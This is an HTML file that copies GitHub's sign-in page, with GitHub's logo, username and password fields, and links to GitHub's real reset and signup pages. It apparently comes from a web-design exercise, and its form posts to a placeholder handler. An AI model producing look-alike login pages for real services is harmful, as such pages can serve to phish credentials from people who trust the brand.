<!DOCTYPE html>
<html lang="en">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<html>

	<style type="text/css">
    
        h1{
             text-align: center;    font-family: Arial, Helvetica, sans-serif;

            }
        div{
            text-align: left;
            width: 300px;
            padding: 10px;
            margin: auto;
            border: 1px solid lightblue;
            border-radius: 5px;
            background-color: aliceblue;
            font-family:  Arial, Helvetica, sans-serif;
            font-size: 15px;

        }
        .div1{
            width: 300px;
            padding: 10px;
            margin: auto;
            border: 1px solid lightblue;
            border-radius: 5px;
            background-color: aliceblue;
         
        }
        .div2{
            width: 300px;
            padding: 10px;
            margin: auto;
            border: 1px solid lightblue;
            border-radius: 5px;
            background-color: white;
        }
        input[type=text], select, textarea {
            width: 100%;
            padding: 12px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
            margin-top: 6px;
            margin-bottom: 16px;
             resize: vertical;
                }

        button {
            background-color: #4CAF50; /* Green */
            border: none;
            color: white;
            padding: 10px 10px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 2px 2px;
            cursor: pointer;
            border-radius: 5px;
            width:100%;

}
        footer{
            width: 300px;
            margin: auto;
        }
    
        ul {
            list-style-type: none;
            width:300x
            margin: auto;
            }

        li {
            display: inline-block;
            }
 </style>
<head>

	<h1><a class="one" href="https://github.com"><img src="https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png" alt="Github Logo" width="60" height="60"></a><br>

	Sign in to GitHub</br></h1></head>

<body>
   <div class=".div1"> 

    <form action="/action_page.php">
	<label for="femail">Username or email address:</label><br><br>
	<input type="text" id="femail" name="femail"><br>
	<label for="fpassword">Password:</label>
    <span><a href="https://github.com/password_reset">Forgot password?</a></span><br>
	<input type="text" id="fpassword" name="fpassword"><br><br>
    <button type="submit" class="block">Sign in</button>
        </br></form></p></div>

<p><div class=".div2"><br>New to Github? <a href="https://github.com/signup?source=login"> Create an account.</a>
        </p>
</div>

</body>
</form>

<footer>
  <ul>
    <li><a herf="https://docs.github.com/en/site-policy/github-terms/github-terms-of-serviceTerms">Terms</a></li>
    <li>Privacy</li>
    <li>Security</li>
    <li>Contact GitHub</li>
  </ul>
</footer>
</html>
